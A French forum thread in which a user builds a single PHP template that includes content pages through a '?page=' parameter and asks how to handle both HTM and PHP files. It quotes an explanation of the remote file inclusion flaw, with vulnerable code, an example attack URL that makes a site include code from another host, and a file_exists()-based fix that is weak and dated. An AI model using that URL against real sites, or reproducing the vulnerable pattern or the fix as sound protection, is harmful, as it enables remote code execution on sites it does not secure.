28173 sujets

CSS et mise en forme, CSS3

Bonjour,
je développe un site à l'aide de div et j'aurais savoir une petite chose. En effet mon site se compose en gros de :
comme le modele 4 avec une largeur de 80% (c'est exactement le même codage)
http://css.alsacreations.com/modeles/modele4.htm

J'ai un menu déroulant qui me donne plus de 100 pages et je ne voudrais pas avoir 100 pages model avec le contenu différent qui fait appel à un include.

Pour être plus clair, ma page index à un include pour le contenu, une autre page pour un autre contenu ect ect.
Je voudrais donc faire comme une sorte de fram avec UNE page unique et appeler mes pages dans mon contenu.
Car si je dois modifier une chose dans ma page "model" je dois modifier les 100 autres pages hey hey.

Merci d'avance
j'ai trouvé un début de réponse Smiley biggrin

pour mon menu de gauche :

<li><a href="index.php?page=bibliotheque_generalite2">Biblioth&egrave;que</a>

le div centre :

<div id="centre"><?php 
	         if (!isset($_GET['page'])) $page= 'accueil'; 
                 switch($page)
                {
                   case 'accueil': include ('assurance_de_pret.html');break;
                   case 'bibliotheque_generalite2': include ('bibliotheque_generalite2.htm');break;
                   case 'suite':include ('suite.htm');break;
                   case 'fin':include ('fin.htm');break;
                } 

?></div>

par contre j'ai toujours le contenu de ma page accueil qui s'affiche et quand je clique sur le 2eme lien du menu
j'ai :
index.php?page=bibliotheque_generalite2 mais toujours le contenu accueil
j'ai vu que pour la sécurité ce n'était pas le top...

a écrit :
La faille include :

Prenons un exemple simple de cette faille : La plupart des sites ayant cette faille utilisent des url du style monsite.com/index.php?page=xxxxx ou xxxxx est une page qui sera inclue comme ceci :

<?php
if(isset($_GET['page']))
{
include $_GET['page'].'.php';
}
else
{
include 'accueil.php';
}
?>

Maintenant il suffit que le pirate place une page intitulée par exemple page sur son serveur. Il se rend ensuite sur le site concerné par la faille, et rentre l'url suivante : monsite.com/index.php?page=http://autre_site.com/page. La page n'est pas exécutée par PHP sur le site distant, elle sera donc exécutée sur le site possédant la faille. Vous pouvez donc vous imaginer des conséquences que cela peut engendrer... Pour contrer cette faille nous devons simplement utiliser la fonction file_exists() (attention en PHP5 ceci n'est plus forcément valable, assurez-vous d'avoir la directive allow_url_fopen à OFF dans votre fichier php.ini. Voici le code corrigé :

<?php
if(isset($_GET['page']) AND file_exists($_GET['page'].'.php'))
{
include $_GET['page'].'.php';
}
else
{
include 'accueil.php';
}
?>

mais par contre comment faire quand je dois inclure des page HTM et PHP dans le test ?